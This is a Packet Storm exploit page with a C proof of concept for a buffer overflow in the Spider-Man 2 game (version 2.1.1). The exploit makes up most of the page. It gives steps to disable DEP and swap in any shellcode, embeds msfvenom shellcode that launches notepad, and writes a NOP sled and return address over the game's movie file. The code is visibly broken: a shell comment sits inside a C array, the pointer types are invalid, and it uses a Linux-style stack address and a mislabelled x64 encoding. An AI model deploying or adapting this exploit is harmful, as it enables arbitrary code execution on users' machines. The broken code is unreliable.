what you don't know can hurt you

Spiderman2 2.1.1 Buffer Overflow

Spiderman2 2.1.1 Buffer Overflow
Posted Apr 21, 2020
Authored by HexraiN

Spiderman2 version 2.1.1 suffers from a buffer overflow vulnerability.

tags | exploit, overflow
MD5 | 72b8f45c1f4a3f5253daa9b1399b79dd

Spiderman2 2.1.1 Buffer Overflow

Change Mirror Download
# Exploit Title: Spiderman2  - Buffer Overflow
# Exploit Author: HexraiN
# Vendor Homepage: https://www.mobygames.com/company/fizz-factor
# Software Link: https://www.mobygames.com/game/spider-man-2-the-game
# Version: 2.1.1
# Tested on: Windows 10 x64
# Greetz : OA Cybersecurity Labs

#Twitter : @smashedkernel

# 1 -> Close DEP for Spiderman.exe
# 2 -> Remove /Your Spiderman Installed File /Movies/ACTIVISN.bik
# 3 -> Change the shellcode with the one you want
# 4 -> Change "installation_path" by yourself.
# 5 -> Compile & Run PoC
# 6 -> Run Game Spiderman.exe
# 7 -> Boom


#include <stdlib.h>
#include <stdio.h>
#include <string.h>

unsigned char shellcode[] =

# msfvenom -p windows/exec CMD=notepad -e x64/alpha_mixed -f c -v

// SIZE = 192 Bytes

"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"
"\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"
"\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b"
"\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03"
"\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b"
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
"\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb"
"\x8d\x5d\x6a\x01\x8d\x85\xb2\x00\x00\x00\x50\x68\x31\x8b\x6f"
"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5"
"\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a"
"\x00\x53\xff\xd5\x6e\x6f\x74\x65\x70\x61\x64\x00";



void main(void)
{
unsigned char *installation_path[] = "C:\\Program
Files(x86)\\Activision\\Spider-Man 2";
strcpy(installation_path,"\\Movies\\ACTIVISN.bik");

char buffer[421];
FILE *vulnerable;

memset(&buffer, 0x90, 421);

long addr = 0xbffff240 + 0xc0; // address to insert into eip ==
address of local buffer in bof + ~192 bytes into nops
memcpy(buffer + 28, &addr, sizeof(long)); // buffer offset at 28 =
location of rip register

memcpy(buffer + sizeof(buffer) - sizeof(shellcode) - 1, shellcode,
sizeof(shellcode));

vulnerable = fopen(installation_path, "w");
fwrite(buffer, 421, 1, vulnerable);
fclose(vulnerable);
}
Login or Register to add favorites

File Archive:

December 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    22 Files
  • 2
    Dec 2nd
    33 Files
  • 3
    Dec 3rd
    16 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close